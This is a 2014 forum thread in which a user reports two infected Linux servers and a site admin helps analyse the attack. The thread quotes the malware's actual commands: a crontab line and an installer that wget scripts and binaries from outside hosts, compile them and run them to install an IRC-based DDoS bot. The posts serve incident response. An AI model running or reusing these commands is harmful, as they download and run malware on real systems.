keopp (Senior Member; Joined: 08 Nov 2008; Posts: 166; Location: Romania)
Posted: Wed Oct 22, 2014 8:10 am    Post subject: Stablehost vulnerability!
Hi all.
I think I was infected.
The service crond is not working - this is how I found out, and the content of /var/spool/cron/crontabs/root is as follows:
Code:
    crontab 2.3.3
    crontab file <opts> replace crontab from file
    crontab - <opts> replace crontab from stdin
    crontab -u user specify user
    crontab -l [user] list crontab for user
    crontab -e [user] edit crontab for user
    crontab -d [user] delete crontab for user
    crontab -c dir specify crontab directory
    @weekly wget -q http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm /tmp/sh >/dev/null 2>&1
I found only this link telling something about this.
Do I have to reinstall?
gerasimos_h (Site Admin; Joined: 09 Aug 2007; Posts: 1757; Location: Greece)
Posted: Wed Oct 22, 2014 9:54 am
You are infected alright, although I wouldn't call this a bug...
The first thing is to try to find out where you were infected from, so that even if you reinstall you won't get infected again...
Looking at the script, you can see the source and what it infects, although there is a straightforward description at the top of the a.c file:
Code:
    This is a IRC based distributed denial of service client.
Code:
    wget http://205.237.100.170/manual/a.c -O /tmp/init.c;
    gcc -o /tmp/init /tmp/init.c;
    chmod +x /tmp/init;
    /tmp/init;
    rm -rf /tmp/init /tmp/init.c;
    wget http://205.237.100.170/manual/pb -O /tmp/p;perl /tmp/p;rm -rf /tmp/p;
    wget http://205.237.100.170/manual/b -O /tmp/b;chmod +x /tmp/b;/tmp/b;rm -rf /tmp/b;
So do you have an idea how you could have been exposed?
For instance, is your root password the same as the one for an email account or service you use, or could the clients you use to connect have a keylogger?
I'm downloading the sources to take a look at them...
gerasimos_h
Superb! Mini Server Project Manager
http://sms.it-ccs.com
keopp (Senior Member)
Posted: Wed Oct 22, 2014 10:32 am
Hi,
You're right, it is not at all a bug, but I put it here since it is the most recent topic about vulnerabilities.
Well, I actually have 2 machines affected. I am the only root user and there are no other users. I can't imagine what happened; I suspect something regarding the DNS (bind) service, because on one machine, even though it shows bind is working, it can't be reached from outside by pinging domain.name.
I can let you inspect the machines... since I am confident in you.
gerasimos_h (Site Admin)
Posted: Wed Oct 22, 2014 10:39 am
I would like to take a look, if you don't mind...
Googling it, they match those attacks with Shellshock, so it might be an app you use that has shell access?
You can send me a temporary password via email, to be more secure...
keopp (Senior Member)
Posted: Wed Oct 22, 2014 10:59 am
Sent by PM (probably twice by mistake...)
keopp (Senior Member)
Posted: Wed Oct 22, 2014 11:02 am
Oh... I forgot, I must say that I deleted 2 weird executable files in /tmp, and also deleted some files in /var/www/cgi-bin. Those from cgi, I kept them.
gerasimos_h (Site Admin)
Posted: Wed Oct 22, 2014 11:02 am
Are you sure you sent it to me? Because I didn't get anything...
keopp (Senior Member)
Posted: Wed Oct 22, 2014 11:03 am
Yes, sure, by PM.
gerasimos_h (Site Admin)
Posted: Wed Oct 22, 2014 11:09 am
OK! My bad, my inbox was 100% full, so can you please send it again...
keopp (Senior Member)
Posted: Wed Oct 22, 2014 11:11 am
Sent now.
keopp (Senior Member)
Posted: Wed Oct 22, 2014 11:15 am
I can confirm the bind service was affected (despite it showing that it is running). I switched to another DNS server (the other infected machine) and now the domain can be pinged.
gerasimos_h (Site Admin)
Posted: Wed Oct 22, 2014 11:21 am
I sent you a PM, did you get it...
keopp (Senior Member)
Posted: Wed Oct 22, 2014 11:23 am
Yes, I received it and gave a response 1 min ago.
keopp (Senior Member)
Posted: Wed Oct 22, 2014 11:27 am
Send me a test message to tudorsps at gmail dot com. I'll use the sender address to give you details.
gerasimos_h (Site Admin)
Posted: Wed Oct 22, 2014 11:32 am
OK...